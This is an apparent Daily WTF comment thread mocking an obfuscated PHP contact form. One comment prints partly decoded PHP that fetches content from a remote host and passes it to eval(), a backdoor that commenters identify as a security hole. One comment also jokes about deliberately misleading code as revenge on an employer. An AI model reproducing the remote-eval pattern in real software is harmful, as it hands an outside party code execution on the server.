- Feature Articles
- CodeSOD
- Error'd
-
Forums
-
Other Articles
- Random Article
- Alex's Soapbox
- Announcements
- Best of…
- Best of Email
- Best of the Sidebar
- Bring Your Own Code
- Coded Smorgasbord
- Mandatory Fun Day
- Off Topic
- Representative Line
- News Roundup
- Editor's Soapbox
- Software on the Rocks
- Souvenir Potpourri
- Sponsor Post
- Tales from the Interview
- The Daily WTF: Live
- Virtudyne
Admin
it's a php implementation of .net's __VIEWSTATE, obviously.
Admin
QmFzZSA2NCBpcyB2ZXJ5IHNlY3VyZS4gQW5kIEZpcnN0Lg==
(Lol, base 64 is very secure).
Admin
You never know what some 'hacker' might do if they figure out how to contact you. You might start getting spam or something!
Admin
This is to complex for Paula, isn't it?
Admin
Y3JleSAtWlpWWlI6Ok9uZnI2NCAtciAnY2V2YWcgcXJwYnFyX29uZnI2NCAoIklUdWNwbE93bzIx Z01KNTBWVHltVlVBeUwzSWxNRjRYIiknCg==
Admin
Was the coder storing PHP code in a session?
Admin
I have failed to post first (1st). This is the seventh (7th) post.
Admin
This code makes baby Jesus cry.
Admin
cFNFV29UOURHenFBRXg1dUdIZ0FxSjlER21xSklIOWZveGIxWlNNREkwdWhJVXlnSXlFT25KOVha S3lpTEhFMG94Z25xVDlYQkprQQpFeDlnR0hjT1pLTzZGVHVZSVFFMkl5SGpMRGNEcVEwOQ==
Admin
PWNED, er....UFdORUQ=
<?php session_start(); ///MAILPERMIN/// if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) { $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time(); $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] - $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']); $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60; if ( ($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20) && ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30* 60 )) { $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054; echo "you have exceeded the number of times you are allowed to use this formPlease try again in an one (1)hour or three(3)
"; exit; } elseif ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 > 30* 60 ) { session_unset(); $_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] = 0; } } if (isset ($_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044'])) { $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time(); $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] - $_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044']); $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60; if ($z3236T732A4228668u4347Z743A5329757x4650S746A5630054 > 2) { $_SESSION['x2226D722A3227678T6670O766A7632034y3135Y731A4128569'] = ""; } } ///MAILPERMIN/// $id_hd = '88BB-5822'; $id_num = 'fghhijklklmnopqrstvvvwxwyyBDJLNQSUYZaZdefhkkmmnppqsvyABDEFILQUXXYXWTOIxkWJynfWNICzuqlfaVPLGAtlfbVSOLKIIJLPVaflryHSdmxGPbirAJUguFQ'; ?> <?php $my_var = ''; $page_data = <<< PAGE_DATA PAGE_DATA; $Y6367K763A7331737W8589B785A9533915U9195O791A1013451 = @fopen ("http://www.spamfreecontact.com/err/?_=402&ok=$id_num", "r"); if (!$Y6367K763A7331737W8589B785A9533915U9195O791A1013451) { /* echo "<p>Unable to open remote file."; */ /* exit; */ } else { while (!feof($Y6367K763A7331737W8589B785A9533915U9195O791A1013451)) { $Y5559U755A6530945w2933H729A3928371v48H704A14260396w .= fgets ($Y6367K763A7331737W8589B785A9533915U9195O791A1013451, 1024); } eval (' ?>' . $Y5559U755A6530945w2933H729A3928371v48H704A14260396w . '<?php '); <p>fclose($Y6367K763A7331737W8589B785A9533915U9195O791A1013451); }
if (($gotten == 111)&&($hd == $id_hd )) { include ('initrodeGlobal_com.php'); } elseif ($gotten != 111) { include ('initrodeGlobal_com.php'); } elseif (($gotten == 111)&&($hd != $id_hd )) { echo $error_msg; } ?>
Admin
One of my former jobs did a similar mucking around operation to their PHP, mainly to keep customers from going and messing with it then making support calls.
I know it was some package that they actually bought a license for. Never paid much attention to see how "secure" it was, as it was really there to be an annoyance.
Admin
How could that be? Paula is Brillant, isn't she?
Admin
Looks like it was run through an obfuscation tool.
Captcha: Mongo like modo
Admin
Exactly what I was thinking. No one, even those not in thier right mind would create variables like that. Obfuscation would always rename your variables in this fashion, the encryption was also part of that process.
Admin
The real WTF is this:
echo "you have exceeded the number of times you are allowed to use this form
Please try again in an one (1)hour or three(3)
";
Admin
This is just so obvious, it even shows how it's encoded in the SAME file!! It would have been a lot better to do the decryption in a separate PHP file, that only includes the encrypted file.
Or you could just use Zend Encoder, which would work, or write your own Apache-module to 'save money' ;)
If this is to run on the client's server, then this would probably suffice.
I once ran into a webpage that was entirely base64-encoded, except for one line of Javascript code. Hey smart-ass, if the user can see the page like it shows up, do you think the client can also use the HTML code? The real joke was that nobody would ever want to copy anything from that code, it looked like crap and so on... The author wanted my opinion on his site. "Well, it doesn't show up in firefox, and I think this line of code is the problem. And by the way, get rid of the encryption, because it only took met 10 minutes to get this code..."
Admin
It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:
http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx
And the site says
Is it some kind of conspiracy?
Admin
Please file this in a T.P.S. Report. ;)
Admin
Try watching Office Space http://www.imdb.com/title/tt0151804/
Admin
;)
Admin
Should have used perl & Acme::Pony
Admin
There is an actual commercial package which costs quite a bit and does exactly this. Name escapes me.
Admin
Sh!t, we've been hacked. All our sensitive R&D data, customer credit and bank records have been stolen. Fortunately one part was uncompromised: the 'Contact Us'-form.
Admin
Thanks for the tip. Utorrent is currently downloading :P
Admin
yes, quite secure.
Admin
It looks like it's been run through an obfuscator.
Admin
PD9waHANCiAgJHRoaXNDb21tZW50LT5mZWF0dXJlZCA9IHRydWU7DQo/Pg==
Admin
Please, everybody, stop saying "encrypted" or "decrypted" -- there's no encryption going on here! Just encoding!
Admin
base64_decode($string2);
now what ?
Admin
Would it be too much to buy the DVD?
Admin
$comment = encrypt(":h>Y1~.`4");
Admin
Save the environment! I don't buy plastic useless disks if i can download it too ;-)
Furthermore, only people from the USA go to pound-me-in-the-ass prisons for downloading movies :')
Admin
spamfreecontact.com? That doesn't sound at all shady!
Admin
This is not all that unusual, actually. It's just been run through an obfuscation tool. Several different ones exist for PHP. You simply run the final code through them, it replaces the variables with gibberish, removes comments and newlines and spaces and such, base 64 encodes, and spits out that result.
Because PHP is basically a scripting language, and therefore the source = the final result, and a lot of silly people want their code to be "secure from prying eyes", you get this sort of nonsense. Useless and ineffective, but... sigh. Try telling that to any of these morons.
One use of obfuscation lately that has been pissing me off is when somebody who makes a theme for WordPress (which is all PHP) obfuscates their own linkback into the footer of the thing, and does it in such a way as to make removing it difficult to a non-coder. A coder, of course, simply runs the code, copies the output, and replaces the obfuscated code with it, minus the linkback, but still, it's annoying. I'm trying to convince various theme hosting sites to not allow themes with this crap code it in. Fortunately, it's relatively easy to detect this sort of thing automatically. You just have to look for long strings of letters and numbers without much spacing.
Admin
Wait, you hacked our site!? You can't do that! It's SECURE! You can get in a lot of trouble for hacking!
Admin
That's standard for code obfuscators -- they change all the variable names, remove all the white space, then base64 encode it.
Admin
At this point, I'm going to have to run most of the comments through a base-64 decode just to see the pointless jokes.
Of course, that's not going to stop me from doing it.
Admin
I see crap like this all the time (I work in Antivirus development). It's basically just obfuscation. Normally you see it in VBScript and Javascript though.
Some of the other tricks they like to do are printing out Javascript which will then in turn be run (Javascript allows code to be self-modifying) and breaking things up by randomly URL-encoding characters in strings or even breaking them up and concatenating them, sometimes bringing in the results of random function calls or variables with junk names too.
This is the first time I've seen someone try and obfuscate PHP like this though.
Admin
wow... that's all i can say....
Admin
Nice! That was a great story.
Admin
They should base64 encode it twice, that way it will take hackers twice as long!
Admin
http://mnenhy.mozdev.org/
Admin
the thing I like the most is the blatant security hole:
that file handle points to a remote URL fopen()ed earlier. So this code basically takes some remote content and feeds it into eval().
How nice of this coder to give their remote service a shell access to his server :-)
Philip
Admin
Why is a long variable name considered secure? notepad's find/replace easily defeats it
Admin
It looks like some newb didnt understand the difference between client and server side exectution. He was probably trying to obfuscate the data on the contact form so that spammers couldnt get the email address via web harvesting. I bet he read that in a shiny IT magazine.
Doing that in javascript does help to some extent. Doing it in PHP is just dumb.
Some PHP encoders make files that look similar to that base64 block of code, but I dont think thats what that is. They would have calls to decrypt the actual string.
Admin
Or just watch it for free. It's on hulu.com
Admin
Hmmmmm.
I am not nearly drunk enough to read this article.
Admin
Now that's a clbuttic!
Admin
Or sales.
Admin
I think a fun way to obfuscate code would be to change all the variable names to names that sound like they would be relevant to this program ... but aren't what the field actually contains. Like change "billing_amount" to "payment_amount" and "stock_number" to "quantity_on_hand". Then add a bunch of comments that carefully describe an algorithm that isn't actualy a part of this program. Okay, it would be a lot of work, but I'd laugh and laugh thinking about the poor guy who comes after me trying to figure it out. I might try this next time I'm really really mad at the company, just before I quit.